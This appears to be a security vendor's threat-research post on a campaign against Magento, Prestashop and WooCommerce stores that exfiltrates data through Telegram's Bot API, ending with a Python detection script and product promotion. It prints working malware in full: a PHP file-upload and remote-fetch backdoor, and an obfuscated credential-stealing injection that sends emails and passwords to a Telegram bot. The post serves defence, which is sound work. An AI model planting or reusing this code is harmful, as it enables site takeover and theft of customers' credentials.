
Hackers are leveraging Telegram to control their malware used to infect e-commerce websites – Astra Security Report

Recently, our security engineers have spotted an ongoing Telegram malware campaign in the wild in which the hackers leverage the widely used encrypted messaging service Telegram to receive error logs from their malware as well as sensitive information from the hacked sites.

The error logs sent to the hacker via Telegram tell them whether their malware was planted successfully on a website; where it was, the malware then sends the victims’ sensitive information to a specific Telegram account or channel. Magento, Prestashop and WooCommerce stores remain the top targets of this hacking campaign.

A large number of sites are being targeted

As a security provider, we continuously monitor the latest cyber threats and malware campaigns that disrupt businesses on a daily basis. In this Telegram malware campaign, we’ve seen a large number of Magento, Prestashop, WooCommerce and other CMS-based sites being targeted.

Usually, when hackers break into websites and capture credit card information or other sensitive data, they make API calls to their own servers or send the information to their email addresses.

In this case, however, instead of making API calls to their own infrastructure or sending the stolen data to an email address, the threat actors send it through Telegram’s Bot API to a particular Telegram account, ID or channel. This avoids exposing a server IP that could be traced or blacklisted, and lets them receive the error logs or stolen data over Telegram’s encrypted channel.

Hackers gathering error logs of malware from Magento sites

During the analysis of this Telegram malware campaign, our research team led by Ananda Krishna discovered that the hackers are actively planting shell scripts on Magento-based sites in order to upload arbitrary files or steal sensitive information. If any error occurs while the malware is being planted, that error is sent to the hacker’s Telegram account/channel for debugging.


After further investigation, our researchers found that the hackers had created malicious backdoors on the website which allowed them to create and execute files. The hacker could send any arbitrary URL to the backdoor script, which would then download the file from that URL and save it on the compromised server. At every step of this process, and in the case of errors, the backdoor script would send real-time updates to the hacker via a Telegram message.

The hacker sent the name of the malicious file in the $_POST['name'] variable and the URL of the malicious file in the $_POST['content'] variable.

Here is an example of the malicious script (as flagged by our malware scanner) we found in a compromised site we scanned:

Image: Malicious code flagged by Astra’s malware scanner

The hacker sends a request with $_POST['name'] = evil.php and $_POST['content'] = example.com/moreMaliciousCode.txt. The backdoor script then creates a file called evil.php on the server with the contents fetched from example.com/moreMaliciousCode.txt. The hacker then visits compromised-site.com/evil.php to execute the malicious code.

On some sites, we’ve seen hackers use this backdoor script to drop “File Manager” scripts or database administration tools such as “Adminer”. Such tools allow them to view, edit or delete every file on your server and give them full access to the website’s database, which may contain sensitive personally identifiable information (PII) such as passwords, email addresses and credit card numbers.

Snippet of the malicious code:

<?php
// Backdoor as found on compromised Magento sites. Both branches require a
// "token_admin" POST value whose triple-MD5 matches the hard-coded hash, so
// only the attacker who knows the token can use it.
try {
    // Branch 1: write an uploaded file one directory above the script.
    if ($_POST['action'] == "wp_ajax_try_2020_v2") {
        if (!empty($_FILES['file']) and md5(md5(md5($_POST['token_admin']))) == "7ccda4acaa2341a049350d96fe88393b") {
            if (function_exists("move_uploaded_file")) {
                @move_uploaded_file($_FILES['file']['tmp_name'], "../" . $_FILES['file']['name']);
                echo " file name : " . $_FILES['file']['name'];
            } else {
                die("no move_upload_file");
            }
        } else {
            die(0);
        }
        exit();
    }
    // Branch 2: fetch the URL given in $_POST['content'] and save the response
    // under the file name given in $_POST['name'] (the evil.php example above).
    if ($_POST['action'] == "wp_ajax_try_2020_v3") {
        if (!empty($_POST['content']) and md5(md5(md5($_POST['token_admin']))) == "7ccda4acaa2341a049350d96fe88393b") {
            if (function_exists("file_get_contents")) {
                $html = file_get_contents($_POST['content']);
                $save = fopen($_POST['name'], "w");
                fwrite($save, $html);
                fclose($save);
            } else {
                die("no file_get_contents");
            }
        } else {
            die(0);
        }
        exit();
    }
} catch (Exception $e) {
    // Any failure is reported to the attacker's Telegram chat through the Bot
    // API: first the requester's IP address, then the exception text.
    if (function_exists("file_get_contents")) {
        try {
            file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($_SERVER['REMOTE_ADDR'] . "  error wp") . "");
            file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($e) . "");
        } catch (Exception $e2) {}
    }
}
?>


Hackers stealing information from Prestashop sites

Similar to the Magento sites, the hackers are also targeting Prestashop sites and leveraging the Telegram API to send the stolen sensitive information of site owners to their Telegram account/channel.

In this case, our researchers saw the hackers inserting their malicious code into the function that retrieves customer details by email in classes/Customer.php, so that the site owner’s email address and password are sent to the Telegram account/channel.

The hacking group is believed to go by the name B4JAT4X (as seen in the code sample below):

// Inserted into the Prestashop customer lookup: capture whichever password
// variable the surrounding code holds, plain or otherwise.
if (isset($passwd)) {
    $passwordbaja = $passwd;
} elseif (isset($plaintextPassword)) {
    $passwordbaja = $plaintextPassword;
}
// Build the message: a group banner followed by email:password:client IP:host.
$djskfhsdfdjknjksnfjksfds = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";
$djskfhsdfdjknjksnfjksfds .= $email . ":" . $passwordbaja . ":" . $_SERVER['REMOTE_ADDR'] . ":" . $_SERVER['SERVER_NAME'] . "\n";
// The Telegram Bot API URL is split into string fragments so that a plain
// search for "api.telegram.org" in the file does not find it.
file_get_contents("https://" . "ap" . "i" . ".tel" . "egr" . "am" . ".org" . "/bot1" . "211" . "998273" . ":AAHft2yajX" . "qGoX3y_" . "K3lfPernQ" . "DPbtspu3g" . "/sendMessa" . "ge?chat_id=" . "11101654" . "05&text=" .
    urlencode($djskfhsdfdjknjksnfjksfds) . "");

If Prestashop site owners store their customers’ credit card information on the site, this can lead to that sensitive customer data being stolen: the hacker can simply log in to the victim’s site with the stolen password and view all of it.
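As an added example (not part of Astra’s report or its scanner), the following Python script applies the detection idea from both code samples above: it first folds the PHP string concatenations the Prestashop sample uses to hide the Telegram URL and the B4JAT4X banner, then looks for the indicators seen in the Magento backdoor. The sample files are constructed, with placeholder bot tokens and chat ids rather than the values seen in the wild.

```python
import re

# Constructed samples modelled on the two snippets in this post; bot tokens and
# chat ids are placeholders, not the values observed in the campaign.
MAGENTO_STYLE = '''<?php
if (!empty($_FILES['file'])) { @move_uploaded_file($_FILES['file']['tmp_name'], "../" . $_FILES['file']['name']); }
if (!empty($_POST['content'])) { $html = file_get_contents($_POST['content']);
    $save = fopen($_POST['name'], "w"); fwrite($save, $html); fclose($save); }
file_get_contents("https://api.telegram.org/botTOKEN_PLACEHOLDER/sendMessage?chat_id=0&text=" . urlencode($e));
'''
PRESTASHOP_STYLE = '''<?php
$msg = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\\n";
file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot"."TOKEN_PLACE"."HOLDER"."/sendMessa"."ge?chat_id="."0&text=" . urlencode($msg));
'''
CLEAN = '''<?php echo file_get_contents("https://example.com/feed.json"); ?>'''

# Two adjacent double-quoted PHP literals joined with "." become one literal.
_ADJACENT = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\.\s*"((?:[^"\\]|\\.)*)"')

def deobfuscate(src):
    """Fold "a"."b"."c" chains so split-up URLs and banners become searchable."""
    prev = None
    while prev != src:
        prev, src = src, _ADJACENT.sub(r'"\1\2"', src)
    return src

# Indicators drawn from the two snippets: Telegram Bot API exfiltration, a URL
# fetched from request input, a file name taken from request input, an upload
# written outside the script's directory, and the group's banner string.
INDICATORS = {
    "telegram_bot_api": re.compile(r'api\.telegram\.org/bot[^/"\s]+/send', re.I),
    "fetch_url_from_request": re.compile(r'file_get_contents\s*\(\s*\$_(?:POST|GET|REQUEST)\[', re.I),
    "write_file_named_by_request": re.compile(r'fopen\s*\(\s*\$_(?:POST|GET|REQUEST)\[[^)]*"w', re.I),
    "upload_outside_webroot": re.compile(r'move_uploaded_file\s*\([^;]*"\.\./"', re.I),
    "b4jat4x_banner": re.compile(r'B4JAT4X'),
}

def scan_php(src):
    """Return the names of every indicator present in the de-obfuscated source."""
    plain = deobfuscate(src)
    return [name for name, rx in INDICATORS.items() if rx.search(plain)]

if __name__ == "__main__":
    for label, sample in [("magento-style", MAGENTO_STYLE), ("prestashop-style", PRESTASHOP_STYLE), ("clean", CLEAN)]:
        print(label, "->", scan_php(sample) or "no indicators")
```

Only double-quoted literals are folded, which is enough for the samples here; a real scan should also cover single quotes and functions such as base64_decode that the page does not show.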

Web security challenges

As the cyber threat landscape keeps expanding, hackers are actively finding new techniques like these to bring online businesses to their knees. If your company is hit by a cyber attack like this, it can also amount to a PII breach and a GDPR breach.

Earlier this month, Malwarebytes also discovered a web skimmer that steals credit card data from websites and sends it to the hacker via Telegram messenger.

To protect your websites against this Telegram malware campaign, block all outbound connections to Telegram (api.telegram.org) at the network level, or use a web application firewall that keeps your site protected against such attacks and does not let hackers steal your sensitive data. Note that the exfiltration in both samples is made by the web server itself (server-side file_get_contents calls), so the block has to apply to the server’s own outbound traffic, not only to visitors’ browsers.

If you are using Astra’s application firewall, you are already protected from this attack and from other attacks and vulnerabilities such as SQLi, XSS, CSRF, LFI, RFI, credit card hacks, spam, bad bots, etc.

Further, Astra’s machine-learning-powered malware scanner can scan a website automatically at regular intervals and flag all foreign elements and suspicious activity on it, including the addition of new malicious files or the modification of existing ones. With the ‘View file difference’ feature of Astra’s malware scanner, you can review all changes from within the dashboard and even delete malicious files with a single click.

Security experts have long recommended regular malware scanning as a key security measure for website safety; it is time you equipped your websites with the necessary security measures to keep them protected at all times.
